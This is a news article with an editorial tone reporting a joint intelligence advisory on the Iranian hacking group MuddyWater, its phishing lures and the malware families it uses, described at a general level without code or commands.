Several U.S. and European intelligence agencies just issued a fresh Cyber-Security Advisory bulletin detailing “malicious cyber operations” underway by the Iranian hacking group MuddyWater. Businesses have been affected in Asia, Africa, Europe, and North America.
Iranian hackers add to confusion
Iranian government-sponsored “hackers,” or as the government calls them, “advanced persistent threat actors,” are “conducting cyber espionage and other malicious cyber operations as part of Iran’s Ministry of Intelligence and Security.” MuddyWater, they say, is “targeting a range of government and private-sector organizations.”
Companies with heavy connections in several crucial industries, including “telecommunications, defense, local government, and oil and natural gas” have been hit. This is over and above the chaos and confusion Russia is trying to cause as smokescreen for their invasion of Ukraine.
The joint taskforce encourages all IT specialists to review the bulletin “Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks.”
They further note that more information is available on their Iran Cyber Threat Overview and Advisories webpage. Hackernews fills in some of the gaps. The big danger comes from new and improved malware.
“MuddyWater actors,” they write, “are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.” They have other names and aliases on the darkweb.
Cyber Security researchers also know them as “Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.” Everybody knows that no matter what you call them, they work for the Ayatollah.
In support of Iran
The group’s cyber offensives have all clearly been performed on behalf of the Iranian Ministry of Intelligence and Security.
Insiders also note that they’ve “been historically observed employing open-source tools to gain access to sensitive data, deploy ransomware, and achieve persistence on victim networks.” They seem to be experts on deploying a PowerShell-based backdoor.
By using “obfuscated PowerShell scripts” the Iranian hackers are able to “conceal the most damaging parts of the attacks, including command-and-control functions.” They get in by tricking unwary targets into opening a seemingly harmless email. Once the zip file is downloaded, the damage is done.
The zips “either contain an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious payload to the infected system.”
Once that happens the system is wide open to “multiple malware sets — including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS — for loading malware, backdoor access, persistence, and exfiltration.” If you think that sounds nasty, it is. Iranian hackers have an impressive toolkit.
“PowGoop functions as a loader responsible for downloading second-stage PowerShell scripts, Small Sieve is described as a Python-based implant used for maintaining foothold in the network by leveraging the Telegram API for C2 communications to evade detection.” If that’s not bad enough, Canopy is “a Windows Script File used to collect and transmit system metadata to an adversary-controlled IP address, and two backdoors called Mori and POWERSTATS that are used to run commands received from the C2 and maintain persistent access.“